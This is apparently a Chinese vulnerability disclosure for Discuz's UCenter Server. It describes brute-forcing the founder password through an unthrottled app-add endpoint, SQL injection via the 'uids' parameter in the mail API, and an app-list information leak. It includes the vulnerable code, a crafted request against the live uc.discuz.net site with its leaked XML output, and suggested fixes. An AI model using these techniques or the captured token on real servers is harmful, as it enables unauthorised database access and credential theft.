|
一个有条件的SQL注射和两个小问题。 1,暴力破解。ucserver的默认管理员登录需要输入验证码,并且还有登录次数的限制,但是在: /control/app.php 内是没有限制登录的次数的
function onadd() {
$ucfounderpw = getgpc('ucfounderpw', 'P');
$apptype = getgpc('apptype', 'P');
$appname = getgpc('appname', 'P');
$appurl = getgpc('appurl', 'P');
$appip = getgpc('appip', 'P');
$viewprourl = getgpc('viewprourl', 'P');
$appcharset = getgpc('appcharset', 'P');
$appdbcharset = getgpc('appdbcharset', 'P');
$apptagtemplates = getgpc('apptagtemplates', 'P');
$appallowips = getgpc('allowips', 'P');
if(md5(md5($ucfounderpw).UC_FOUNDERSALT) == UC_FOUNDERPW || (strlen($ucfounderpw) == 32 && $ucfounderpw == md5(UC_FOUNDERPW))) {
只要登录的密码符合,就可以添加一个客户端连接到ucserver并且分配一个uckey和数据库信息。
else {
//$return = "UC_STATUS_OK|$app[authkey]|$app[appid]|".UC_DBHOST.'|'.UC_DBNAME.'|'.UC_DBUSER.'|'.UC_DBPW.'|'.UC_DBCHARSET.'|'.UC_DBTABLEPRE.'|'.UC_CHARSET;
$return = "$app[authkey]|$app[appid]|".UC_DBHOST.'|'.UC_DBNAME.'|'.UC_DBUSER.'|'.UC_DBPW.'|'.UC_DBCHARSET.'|'.UC_DBTABLEPRE.'|'.UC_CHARSET;
}
2,已知客户端的uckey的情况下,对ucserver进行SQL注射 代码在: /control/mail.php 中
function onadd() {
$this->load('mail');
$mail = array();
$mail['appid']= $this->app['appid'];
$mail['uids']= explode(',', $this->input('uids'));
$mail['emails']= explode(',', $this->input('emails'));
$mail['subject']= $this->input('subject');
$mail['message']= $this->input('message');
$mail['charset']= $this->input('charset');
$mail['htmlon']= intval($this->input('htmlon'));
$mail['level']= abs(intval($this->input('level')));
$mail['frommail']= $this->input('frommail');
$mail['dateline']= $this->time;
return $_ENV['mail']->add($mail);
}
$mail['uids']= explode(',', $this->input('uids')); 这句代码中的$mail['uids']最后进到了SQL语句里,相应的代码在: model/mail.php里有:
$mail['email_to'] = array();
$uids = 0;
foreach($mail['uids'] as $uid) {
if(empty($uid)) continue;
$uids .= ','.$uid;
}
$users = $this->db->fetch_all("SELECT uid, username, email FROM ".UC_DBTABLEPRE."members WHERE uid IN ($uids)");
$mail['email_to']被拼到$uids里最后导致了SQL注射。 3,信息泄漏,泄漏ucserver内的客户端应用和相应版本 代码在: control/app.php 内
function onls() {
$this->init_input();
$applist = $_ENV['app']->get_apps('appid, type, name, url, tagtemplates, viewprourl, synlogin');
$applist2 = array();
foreach($applist as $key => $app) {
$app['tagtemplates'] = $this->unserialize($app['tagtemplates']);
$applist2[$app['appid']] = $app;
}
return $applist2;
}
所以只要$this->init_input();能正确运行,那么就会抛出ucserver里面的应用和相应的版本号。 正好上传头像的api是存在$this->input()所需要的信息的,我们拿官方做个实验。 登录后访问: http://www.discuz.net/home.php?mod=spacecp&ac=avatar
获得 http://uc.discuz.net/images/camera.swf?inajax=1&appid=13&input=2b310Oraxl%2BiVL8yXhYy7pJ5DkQOPHYLt2FRsTEIyOD3PMtxkbn%2FDKkzssQgMWYlBirpQPsYOuN4vT9J5mZF7V6Q%2BRD3A8GK9uBTSj8%2FCEOGkPH959sDeep%2FiFag6X8&agent=569b93c7d7e18a505d671ba495198a3a&ucapi=uc.discuz.net&avatartype=virtual&uploadSize=2048 抠出我们要的东西
?inajax=1&appid=13&input=2b310Oraxl%2BiVL8yXhYy7pJ5DkQOPHYLt2FRsTEIyOD3PMtxkbn%2FDKkzssQgMWYlBirpQPsYOuN4vT9J5mZF7V6Q%2BRD3A8GK9uBTSj8%2FCEOGkPH959sDeep%2FiFag6X8&agent=569b93c7d7e18a505d671ba495198a3a&ucapi=uc.discuz.net&avatartype=virtual&uploadSize=2048 拼一下,得到: http://uc.discuz.net/index.php?m=app&a=ls&inajax=1&appid=13&input=2b310Oraxl%2BiVL8yXhYy7pJ5DkQOPHYLt2FRsTEIyOD3PMtxkbn%2FDKkzssQgMWYlBirpQPsYOuN4vT9J5mZF7V6Q%2BRD3A8GK9uBTSj8%2FCEOGkPH959sDeep%2FiFag6X8&agent=569b93c7d7e18a505d671ba495198a3a&ucapi=uc.discuz.net&avatartype=virtual&uploadSize=2048 访问得到:
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="14">
<item id="appid"><![CDATA[14]]></item>
<item id="type"><![CDATA[UCHOME]]></item>
<item id="name"><![CDATA[uchome]]></item>
<item id="url"><![CDATA[http://u.discuz.net/home]]></item>
<item id="tagtemplates">
<item id="template"><![CDATA[]]></item>
</item>
<item id="viewprourl"><![CDATA[]]></item>
<item id="synlogin"><![CDATA[0]]></item>
</item>
<item id="9">
<item id="appid"><![CDATA[9]]></item>
<item id="type"><![CDATA[OTHER]]></item>
<item id="name"><![CDATA[Manyou_UChome]]></item>
<item id="url"><![CDATA[http://uchome.developer.manyou.com/uchome]]></item>
<item id="tagtemplates">
<item id="template"><![CDATA[]]></item>
</item>
<item id="viewprourl"><![CDATA[/space.php?uid=%s]]></item>
<item id="synlogin"><![CDATA[1]]></item>
</item>
<item id="11">
<item id="appid"><![CDATA[11]]></item>
<item id="type"><![CDATA[OTHER]]></item>
<item id="name"><![CDATA[手握手]]></item>
<item id="url"><![CDATA[http://sws.discuz.net/]]></item>
<item id="tagtemplates">
<item id="template"><![CDATA[]]></item>
</item>
<item id="viewprourl"><![CDATA[]]></item>
<item id="synlogin"><![CDATA[0]]></item>
</item>
<item id="13">
<item id="appid"><![CDATA[13]]></item>
<item id="type"><![CDATA[]]></item>
<item id="name"><![CDATA[Discuz!]]></item>
<item id="url"><![CDATA[http://www.discuz.net/]]></item>
<item id="tagtemplates">
<item id="template"><![CDATA[<a href="{url}?sid=" target="_blank">{subject}</a>]]></item>
<item id="fields">
<item id="subject"><![CDATA[标题]]></item>
<item id="uid"><![CDATA[用户 ID]]></item>
<item id="username"><![CDATA[发帖者]]></item>
<item id="dateline"><![CDATA[日期]]></item>
<item id="url"><![CDATA[主题地址]]></item>
</item>
</item>
<item id="viewprourl"><![CDATA[]]></item>
<item id="synlogin"><![CDATA[1]]></item>
</item>
</root>
漏洞证明:
整个其实危害还是挺大的: 如果你能暴力出来一个ucserver的管理员密码,你就可以把ucserver和uclient黑了。 如果你能黑掉你列出来的任何一个uclient的应用,你就可以拿应用的uckey对ucserver注射。 修复方案:uc的onls用不上的话可以去掉或者做限制。 onadd也可以做个次数限制。 SQL注射直接在foreach里进行intval就好了。 |
-
上一篇: 别克汽车公司某分站拿shell - 网站安全 - 自学ph
下一篇: Winmail邮件正文存储型xss(有触发条件) - 网站安
还没有人抢沙发呢~